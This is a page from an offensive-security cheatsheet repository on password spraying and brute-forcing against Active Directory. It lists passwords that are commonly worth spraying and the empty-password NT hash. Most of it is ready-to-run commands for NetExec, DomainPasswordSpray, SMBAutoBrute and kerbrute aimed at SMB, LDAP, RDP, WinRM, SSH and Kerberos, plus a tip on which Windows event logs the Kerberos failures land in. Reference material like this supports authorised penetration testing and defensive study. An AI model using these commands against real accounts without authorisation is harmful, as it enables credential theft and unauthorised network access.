daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

pwd-spraying.md (4373B)


      1 ---
      2 title: "Password - Spraying"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/pwd-spraying.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/pwd-spraying.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Password - Spraying
     12 
     13 Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password.
     14 
     15 > The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.
     16 
     17 Most of the time the best passwords to spray are :
     18 
     19 - Passwords: `P@ssw0rd01`, `Password123`, `Password1`,
     20 - Common password: `Welcome1`/`Welcome01`, `Hello123`, `mimikatz`
     21 - $Companyname1:`$Microsoft1`
     22 - SeasonYear: `Winter2019*`, `Spring2020!`, `Summer2018?`, `Summer2020`, `July2020!`
     23 - Default AD password with simple mutations such as number-1, special character iteration (`*`,`?`,`!`,`#`)
     24 - Empty Password: NT hash is `31d6cfe0d16ae931b73c59d7e0c089c0`
     25 
     26 :warning: be careful with the account lockout !
     27 
     28 ## Spray a pre-generated passwords list
     29 
     30 - Using [Pennyw0rth/NetExec](https://github.com/Pennyw0rth/NetExec)
     31 
     32   ```powershell
     33   nxc smb 10.0.0.1 -u /path/to/users.txt -p Password123
     34   nxc smb 10.0.0.1 -u Administrator -p /path/to/passwords.txt
     35   
     36   nxc smb targets.txt -u Administrator -p Password123 -d domain.local
     37   nxc ldap targets.txt -u Administrator -p Password123 -d domain.local
     38   nxc rdp targets.txt -u Administrator -p Password123 -d domain.local
     39   nxc winrm targets.txt -u Administrator -p Password123 -d domain.local
     40   nxc mssql targets.txt -u Administrator -p Password123 -d domain.local
     41   nxc wmi targets.txt -u Administrator -p Password123 -d domain.local
     42 
     43   nxc ssh targets.txt -u Administrator -p Password123
     44   nxc vnc targets.txt -u Administrator -p Password123
     45   nxc ftp targets.txt -u Administrator -p Password123
     46   nxc nfs targets.txt -u Administrator -p Password123
     47   ```
     48 
     49 - Using [hashcat/maskprocessor](https://github.com/hashcat/maskprocessor) to generate passwords following a specific rule
     50 
     51   ```powershell
     52   nxc smb 10.0.0.1/24 -u Administrator -p `(./mp64.bin Pass@wor?l?a)`
     53   ```
     54 
     55 - Using [dafthack/DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray) to spray a password against all users of a domain.
     56 
     57   ```powershell
     58   Invoke-DomainPasswordSpray -Password Summer2021!
     59   Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
     60   ```
     61 
     62 - Using [shellntel-acct/scripts/SMBAutoBrute](https://github.com/shellntel-acct/scripts/blob/master/Invoke-SMBAutoBrute.ps1).
     63 
     64   ```powershell
     65   Invoke-SMBAutoBrute -PasswordList "jennifer, yankees" -LockoutThreshold 3
     66   Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5 -ShowVerbose
     67   ```
     68 
     69 ## BadPwdCount attribute
     70 
     71 > The number of times the user tried to log on to the account using an incorrect password. A value of `0` indicates that the value is unknown.
     72 
     73 ```powershell
     74 $ netexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users
     75 LDAP        10.0.2.11       389    dc01       Guest      badpwdcount: 0 pwdLastSet: <never>
     76 LDAP        10.0.2.11       389    dc01       krbtgt     badpwdcount: 0 pwdLastSet: <never>
     77 ```
     78 
     79 ## Kerberos pre-auth bruteforcing
     80 
     81 Using [ropnop/kerbrute](https://github.com/ropnop/kerbrute), a tool to perform Kerberos pre-auth bruteforcing.
     82 
     83 > Kerberos pre-authentication errors are not logged in Active Directory with a normal **Logon failure event (4625)**, but rather with specific logs to **Kerberos pre-authentication failure (4771)**.
     84 
     85 - Username bruteforce
     86 
     87   ```powershell
     88   ./kerbrute_linux_amd64 userenum -d domain.local --dc 10.10.10.10 usernames.txt
     89   ```
     90 
     91 - Password bruteforce
     92 
     93   ```powershell
     94   ./kerbrute_linux_amd64 bruteuser -d domain.local --dc 10.10.10.10 rockyou.txt username
     95   ```
     96 
     97 - Password spray
     98 
     99   ```powershell
    100   ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt Password123
    101   ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt rockyou.txt
    102   ./kerbrute_linux_amd64 passwordspray -d domain.local --dc 10.10.10.10 domain_users.txt '123456' -v --delay 100 -o kerbrute-passwordspray-123456.log
    103   ```